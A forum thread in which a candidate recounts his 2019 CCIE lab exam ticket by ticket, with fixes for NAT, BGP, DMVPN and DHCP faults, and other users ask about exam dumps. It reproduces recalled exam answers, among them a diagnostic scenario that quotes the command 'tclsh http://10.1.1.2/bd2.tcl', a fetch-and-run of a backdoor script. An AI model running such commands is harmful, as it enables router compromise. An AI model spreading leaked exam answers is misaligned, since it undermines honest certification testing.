Jump to content
balajijsh

Got my CCIE !! TS2/Diag H3/CFG - A4 aka H1 plus

Recommended Posts

I took my exam on June 14 , 2019 and was able to get my CCIE #.

 

Small Tips :

People might have already shared on this forum but trying to reiterate the same.

 

1. Try to understand the packet flow in each sub section of a lab (TS or config), it will be useful to troubleshoot the issues in exam time

2. In each sub section of lab ( For instance, DC1 in H3 config), practice configuring all protocols at the same time ( OSPF, BGP, STP, DHCP, Multicast and NAT)

3. Practice makes a man perfect. Therefore, there is no substitute for practice.

4. Until you select "Start lab", the timer for TS/Diag doesnt start in the computer. However the moderator/invigilator has different set of timings and he clearly mentions them on the board. So please be aware to click on the appropriate buttons on the page.

 

Section TS :

 

Ticket 1 : It took more than 20 minutes to realize that there is "port security" configured in SW410. Because in the practice labs, the faults were mostly in SW400/SW401. Since i understood the packet flow, i was able to crack it

 

Ticket 2: NAT was not configured (ip nat inside/outside) in R14. Once NAT was configured, traceroute from Server1 in DC1 to ISP got matched exactly

 

Ticket 3::

Fault 1: iBGP neighborship between R22 and R23 (BGP RRs) was down. In R23, the lo0 interface was part of a different OSPF ID.

Fault 2 : Advertised R12-R22 link and R13-R23 link on both R12 and R13( should not advertise on R22 and R23) to exactly match the traceroute output requested.

 

Ticket 4:

Fault 1 : R10 was advertising higher LP for Large Office (10.4) and Medium Office ( 10.5) networks. Two solutions - reduce LP in R10 or increase LP in R12

Fault 2 : BGP cost community attribute used in R20/R21. We can use the command to ignore the cost community in best patch calculation and also increase OSPF cost of R20 Lo0

 

Ticket 5 : DMVPN tunnel parameter mismatch. Traceroute expected from Server1 to small office vlan 100/101. Therefore OSPF between R60 and SW600 need to be established.

Spoke to spoke communication(R60, R51) has to be verified. This is very important

 

Ticket 6: Ipv6 DHCP server configuration needed to be added on Vlan 2001 in SW111

 

Ticket 7: MPLS password mismatch between peers in the MPLS VPN network (CISCO and CISC0 - Note the alpahabet "O" and number "0") - This was a very subtle difference and i was not able to crack it during exam hours- i actually removed the password and traceroute worked but probably might have lost marks for it.

 

Ticket 8 : DHCP server in HQ was providing incorrect GW ( Vlan 2001 HSRP IP was provided as GW to user in Vlan 2000 and vice versa). Modify the GW in DHCP server configuration and increase the DHCP lease timer to infinity.

 

Ticket 9 :

Fault 1 :NAT was incorrectly configured in R71. ( IP nat inside missing on the interface facing R70/NAS).

Fault 2 : DMVPN tunnel key mismatch between R24 and R71. Please remember to Copy paste the tunnel key from DMVPN HUB (R24) into Spoke (R71) and not vice versa

 

Ticket 10 :

Couldnt crack the NAT configuration. There was ACL configured on Server2 to permit only a few networks. I had inadvertently removed it without copying the existing config.

 

I used the whole 2 hours and additional 30 minutes but couldn't find solution in R24/R25.

 

 

Section Diag :

 

H3 diag

 

Need to select the following options from drop down list

1.

 

a. show ip dhcp relay information trusted sources

b. Search for the first "DHCP discover" packet with source IP 0.0.0.0 in the packet capture and select the packet no

c. Highlight link between SW1-SW3

 

2. Attacker is 10.1.1.1, Server 10.1.1.2

 

a. Select the following options for question

 

TCP connection from a remote host to the router’s IP address 10.1.1.1 on port 1337

TCP connection from the router to 10.1.1.2

Download of a TCL script in memory via HTTP

Installment of a ransomware via a backdoor

 

b. sudo poweroff

 

c. tclsh http://10.1.1.2/bd2.tcl

 

 

Section Config :

 

Config lab as per SPOTO its termed "A4" and in cert collection forums its termed "H1 plus"

 

Same as in WB. There will be additional VRFs(Yellow VRF) configured on R6 and R7 in the MPLS VPN (AS 12345). But eBGP neighborship has to be established as per requirement.

 

Questions were very precise. The network diagrams were very clear and easy to understand. Configuration was easy as i had practised well and i was able to complete them in 3 hours 15 minutes.

 

Then went for a walk outside the building for 15 minutes. Came back and finished all verifications (Traceroute outputs, Ping).

 

Use the command "no mpls ip propagate-ttl" to disable MPLS TTL propagation and match traceroute. Add weight in R20 towards R3 (INET VRF) because traceroute was very specific to go via R3 at all times.

 

Good luck everyone !

 

 

In Diag, I would like to know : when you filter wireshark with cmd "bootp"

Which IP address was the source and destination? Attacker is 10.1.1.1? , Server 10.1.1.2?

little bit confusing.

 

Thanks again and congrats!

Share this post


Link to post
Share on other sites

Hello,

Congratz

 

same question about diag :

 

Which IP address was the source and destination? Attacker is 10.1.1.1? , Server 10.1.1.2?

Share this post


Link to post
Share on other sites

Just interested if there were other CCIE RS candidates with you in the room? Did they mentioned what version of TS/DIAG/CONFIG they get. I booked my lab for August and I am interested to understand if there is really a new Config Lab as some people are discussing on this forum?

 

Thanks

Hidden Content

    Give reaction to this post to see the hidden content.
/uploads/emoticons/default_smile.png">

  • Like 1

Share this post


Link to post
Share on other sites

Hi,

 

Where we can download a workbook for all three sections?

Hidden Content

    Give reaction to this post to see the hidden content.

 

This is the latest dump in the forum as far as i know.

 

Please inform me too if you have a better/newer dump.

  • Like 1

Share this post


Link to post
Share on other sites

I took my exam on June 14 , 2019 and was able to get my CCIE #.

 

Small Tips :

People might have already shared on this forum but trying to reiterate the same.

 

1. Try to understand the packet flow in each sub section of a lab (TS or config), it will be useful to troubleshoot the issues in exam time

2. In each sub section of lab ( For instance, DC1 in H3 config), practice configuring all protocols at the same time ( OSPF, BGP, STP, DHCP, Multicast and NAT)

3. Practice makes a man perfect. Therefore, there is no substitute for practice.

4. Until you select "Start lab", the timer for TS/Diag doesnt start in the computer. However the moderator/invigilator has different set of timings and he clearly mentions them on the board. So please be aware to click on the appropriate buttons on the page.

 

Section TS :

 

Ticket 1 : It took more than 20 minutes to realize that there is "port security" configured in SW410. Because in the practice labs, the faults were mostly in SW400/SW401. Since i understood the packet flow, i was able to crack it

 

Ticket 2: NAT was not configured (ip nat inside/outside) in R14. Once NAT was configured, traceroute from Server1 in DC1 to ISP got matched exactly

 

Ticket 3::

Fault 1: iBGP neighborship between R22 and R23 (BGP RRs) was down. In R23, the lo0 interface was part of a different OSPF ID.

Fault 2 : Advertised R12-R22 link and R13-R23 link on both R12 and R13( should not advertise on R22 and R23) to exactly match the traceroute output requested.

 

Ticket 4:

Fault 1 : R10 was advertising higher LP for Large Office (10.4) and Medium Office ( 10.5) networks. Two solutions - reduce LP in R10 or increase LP in R12

Fault 2 : BGP cost community attribute used in R20/R21. We can use the command to ignore the cost community in best patch calculation and also increase OSPF cost of R20 Lo0

 

Ticket 5 : DMVPN tunnel parameter mismatch. Traceroute expected from Server1 to small office vlan 100/101. Therefore OSPF between R60 and SW600 need to be established.

Spoke to spoke communication(R60, R51) has to be verified. This is very important

 

Ticket 6: Ipv6 DHCP server configuration needed to be added on Vlan 2001 in SW111

 

Ticket 7: MPLS password mismatch between peers in the MPLS VPN network (CISCO and CISC0 - Note the alpahabet "O" and number "0") - This was a very subtle difference and i was not able to crack it during exam hours- i actually removed the password and traceroute worked but probably might have lost marks for it.

 

Ticket 8 : DHCP server in HQ was providing incorrect GW ( Vlan 2001 HSRP IP was provided as GW to user in Vlan 2000 and vice versa). Modify the GW in DHCP server configuration and increase the DHCP lease timer to infinity.

 

Ticket 9 :

Fault 1 :NAT was incorrectly configured in R71. ( IP nat inside missing on the interface facing R70/NAS).

Fault 2 : DMVPN tunnel key mismatch between R24 and R71. Please remember to Copy paste the tunnel key from DMVPN HUB (R24) into Spoke (R71) and not vice versa

 

Ticket 10 :

Couldnt crack the NAT configuration. There was ACL configured on Server2 to permit only a few networks. I had inadvertently removed it without copying the existing config.

 

I used the whole 2 hours and additional 30 minutes but couldn't find solution in R24/R25.

 

 

Section Diag :

 

H3 diag

 

Need to select the following options from drop down list

1.

 

a. show ip dhcp relay information trusted sources

b. Search for the first "DHCP discover" packet with source IP 0.0.0.0 in the packet capture and select the packet no

c. Highlight link between SW1-SW3

 

2. Attacker is 10.1.1.1, Server 10.1.1.2

 

a. Select the following options for question

 

TCP connection from a remote host to the router’s IP address 10.1.1.1 on port 1337

TCP connection from the router to 10.1.1.2

Download of a TCL script in memory via HTTP

Installment of a ransomware via a backdoor

 

b. sudo poweroff

 

c. tclsh http://10.1.1.2/bd2.tcl

 

 

Section Config :

 

Config lab as per SPOTO its termed "A4" and in cert collection forums its termed "H1 plus"

 

Same as in WB. There will be additional VRFs(Yellow VRF) configured on R6 and R7 in the MPLS VPN (AS 12345). But eBGP neighborship has to be established as per requirement.

 

Questions were very precise. The network diagrams were very clear and easy to understand. Configuration was easy as i had practised well and i was able to complete them in 3 hours 15 minutes.

 

Then went for a walk outside the building for 15 minutes. Came back and finished all verifications (Traceroute outputs, Ping).

 

Use the command "no mpls ip propagate-ttl" to disable MPLS TTL propagation and match traceroute. Add weight in R20 towards R3 (INET VRF) because traceroute was very specific to go via R3 at all times.

 

Good luck everyone !

 

GREAT feedback! can you share link of the materials you are using?

Share this post


Link to post
Share on other sites

Just interested if there were other CCIE RS candidates with you in the room? Did they mentioned what version of TS/DIAG/CONFIG they get. I booked my lab for August and I am interested to understand if there is really a new Config Lab as some people are discussing on this forum?

 

Thanks

Hidden Content

    Give reaction to this post to see the hidden content.
/uploads/emoticons/default_smile.png">

 

One other CCIE RS candidate passed on the same day. He got TS2 //Diag not sure//Config-H3

Share this post


Link to post
Share on other sites

In Diag, I would like to know : when you filter wireshark with cmd "bootp"

Which IP address was the source and destination? Attacker is 10.1.1.1? , Server 10.1.1.2?

little bit confusing.

 

Thanks again and congrats!

Hello,

Congratz

 

same question about diag :

 

Which IP address was the source and destination? Attacker is 10.1.1.1? , Server 10.1.1.2?

 

 

The options i selected in the diag for this query are listed below. Please extrapolate the Diag query as appropriate

 

TCP connection from a remote host to the router’s IP address 10.1.1.1 on port 1337

TCP connection from the router to 10.1.1.2

Download of a TCL script in memory via HTTP

Installment of a ransomware via a backdoor

Edited by balajijsh

Share this post


Link to post
Share on other sites

many thanks for the feedback.

I would like to know the reason of adding VRF YELLOW since the traffic is going through R3 anyway to the network 10.2.x..x. IS there any particular reason for that??

 

Thanks and enjoy your number

Share this post


Link to post
Share on other sites

good job...enjoy!!

 

Hi First of all Congratulations.

I have been thinking about the Ticket#10 which is also in SPOTO Solution as below: (Please try to recall if you faced similar config or different)?

 

Server2#sh run | s line vty 0 4

line vty 0 4

access-class 1 in

password cisco

login

transport input telnet

 

Server2#sh run | s access

access-list 1 permit 201.99.25.70

access-list 1 permit 10.2.0.0 0.0.255.255

access-list 1 permit 10.200.0.0 0.0.0.255

201.99.25.70 is IP address used from NAT at R24/R25

 

ip nat outside source static 201.99.70.2 201.99.25.70

Format:

Ip nat outside source static outsideLOCAL outsideGLOBAL

This outsideGLOBAL ip add can be found from R24/R25 BGP Table.

2nd Q: Can you explain a little more about TICKET#4 FAULT:2; how much cost value did you use for R20-interface lo0 and was it asked that dont touch to BGP attribute to solve in this Question?

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...